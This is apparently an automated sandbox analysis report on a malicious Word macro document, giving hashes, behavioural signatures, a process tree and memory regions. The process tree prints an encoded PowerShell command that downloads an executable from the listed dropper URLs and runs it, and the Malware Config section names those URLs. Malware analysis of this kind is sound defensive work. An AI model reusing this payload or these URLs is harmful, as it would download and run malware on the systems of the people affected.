Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    27-05-2024 12:43

General

  • Target

    7932f7ac5f4b3d4b0b967cf198e81aca_JaffaCakes118.doc

  • Size

    480KB

  • MD5

    7932f7ac5f4b3d4b0b967cf198e81aca

  • SHA1

    3ed3ac5b89589a3c9af34300e8d80e1aa63cb491

  • SHA256

    535dd500af21f1fcd2d774c871c85920c5a4e6e85e9e4c9ad7f6f863f945d1fe

  • SHA512

    f083d13583ffaf502a4e780ed5a4d374953920b77d824565856497aaba778773569fc0754a9683f9ba0023e3e21f27f6ed0fa689ec3f16c28110450cbc370850

  • SSDEEP

    6144:BuQUQNrSA3hifBq7JwMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvVAJTj:BzUvA3hfw8SVIf51E4K14o8IuJ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://shashlichnydom.ru/NbEDRSsyiy_Rl2

exe.dropper

http://wolf.camera/jkeU0iK6Mf8v_dy0Ad

exe.dropper

http://www.marekvoprsal.cz/s1yTiin0l_AUP

exe.dropper

http://www.eufacopublicidade.com.br/ULxnLcrzzz4E

exe.dropper

http://londonmarathon2019.kevinmiller66.co.uk/9bT6FbyqID9O9B

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7932f7ac5f4b3d4b0b967cf198e81aca_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABKAF8AMgA2AF8AMQBfAD0AKAAnAE8AXwAxADYAXwAnACsAJwBfADgAJwArACcAMgAnACkAOwAkAGkANgAyADkANABfAF8ANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB0ADcAXwA4ADkAXwBfADYAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBzAGgAYQBzACcAKwAnAGgAbAAnACsAJwBpAGMAaAAnACsAJwBuAHkAZAAnACsAJwBvAG0AJwArACcALgByAHUALwBOAGIARQBEAFIAUwBzAHkAaQAnACsAJwB5ACcAKwAnAF8AUgAnACsAJwBsADIAQAAnACsAJwBoAHQAdAAnACsAJwBwADoAJwArACcALwAvACcAKwAnAHcAbwBsACcAKwAnAGYALgBjAGEAJwArACcAbQBlAHIAJwArACcAYQAvACcAKwAnAGoAawBlACcAKwAnAFUAMABpACcAKwAnAEsANgAnACsAJwBNAGYAOAAnACsAJwB2AF8AJwArACcAZAAnACsAJwB5ADAAQQBkAEAAaAB0ACcAKwAnAHQAcAA6AC8ALwB3ACcAKwAnAHcAdwAnACsAJwAuACcAKwAnAG0AJwArACcAYQByAGUAawB2AG8AcAByAHMAJwArACcAYQBsACcAKwAnAC4AYwAnACsAJwB6AC8AcwAnACsAJwAxAHkAVAAnACsAJwBpAGkAJwArACcAbgAwACcAKwAnAGwAXwBBACcAKwAnAFUAUAAnACsAJwBAAGgAdAB0AHAAOgAvAC8AdwAnACsAJwB3AHcAJwArACcALgAnACsAJwBlAHUAZgBhAGMAbwBwAHUAYgBsAGkAYwBpAGQAYQBkAGUALgBjACcAKwAnAG8AJwArACcAbQAuAGIAcgAvACcAKwAnAFUAJwArACcATAAnACsAJwB4AG4ATAAnACsAJwBjACcAKwAnAHIAegB6AHoANABFAEAAaAB0ACcAKwAnAHQAcAA6AC8AJwArACcALwBsACcAKwAnAG8AbgAnACsAJwBkACcAKwAnAG8AbgAnACsAJwBtAGEAcgBhAHQAaABvACcAKwAnAG4AMgAwADEAOQAuACcAKwAnAGsAZQAnACsAJwB2AGkAbgBtAGkAbAAnACsAJwBsAGUAcgAnACsAJwA2ACcAKwAnADYALgBjAG8ALgB1AGsALwA5AGIAVAA2AEYAYgAnACsAJwB5ACcAKwAnAHEASQBEADkATwA5ACcAKwAnAEIAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQA3ADAANAA4ADkAOQA9ACgAJwBMAF8ANwAnACsAJwBfAF8AOAAnACkAOwAkAEcAXwBfADMAMgBfAF8AIAA9ACAAKAAnADIAJwArACcANQA0ACcAKQA7ACQAdAAyADcAOQBfADMAPQAoACcAVABfADEAMgAnACsAJwAwADEAJwApADsAJABzADcANgBfADMANQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBfAF8AMwAyAF8AXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHMANQA5ADEAMwA3ADMAIABpAG4AIAAkAHQANwBfADgAOQBfAF8ANgApAHsAdAByAHkAewAkAGkANgAyADkANABfAF8ANgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABzADUAOQAxADMANwAzACwAIAAkAHMANwA2AF8AMwA1ACkAOwAkAGsAMwA4ADkAOQBfAD0AKAAnAGYAXwA0ACcAKwAnAF8AXwAzAF8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcwA3ADYAXwAzADUAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABzADcANgBfADMANQA7ACQATgA0AF8AXwBfADcANwA9ACgAJwBMAF8ANwAyADgAJwArACcAXwAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgA2AF8AMAAwADEAXwA9ACgAJwBNAF8ANAA1ADMAXwAnACsAJwA3ACcAKwAnADkAJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2340

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      5bcaebb4cc38bbb9d46136e8848b6418

      SHA1

      7f341c8e99a33f4e2647dd228fa993440f355fee

      SHA256

      99f2c5e4ac5d5ace850f1379f6df6c34d23a147a16f503de9ce2088b6e24ae05

      SHA512

      83132cd08b2f101bb899237ad3a9a988c3c751483a765ac246e876d2eb7414345aab90c35ca66080af18a59af3caaa9b8cc0bd1dadae7626718877e0a7492063

    • memory/1868-118-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-158-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-59-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-9-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-14-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-10-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-13-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-20-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-16-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-15-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-12-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-17-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-18-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-11-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-8-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-111-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-2-0x0000000070F8D000-0x0000000070F98000-memory.dmp
      Filesize

      44KB

    • memory/1868-69-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-70-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-62-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-49-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-39-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-33-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-29-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-0-0x000000002F751000-0x000000002F752000-memory.dmp
      Filesize

      4KB

    • memory/1868-157-0x0000000070F8D000-0x0000000070F98000-memory.dmp
      Filesize

      44KB

    • memory/1868-134-0x0000000070F8D000-0x0000000070F98000-memory.dmp
      Filesize

      44KB

    • memory/1868-135-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/1868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2340-128-0x0000000002870000-0x0000000002878000-memory.dmp
      Filesize

      32KB

    • memory/2340-127-0x000000001B710000-0x000000001B9F2000-memory.dmp
      Filesize

      2.9MB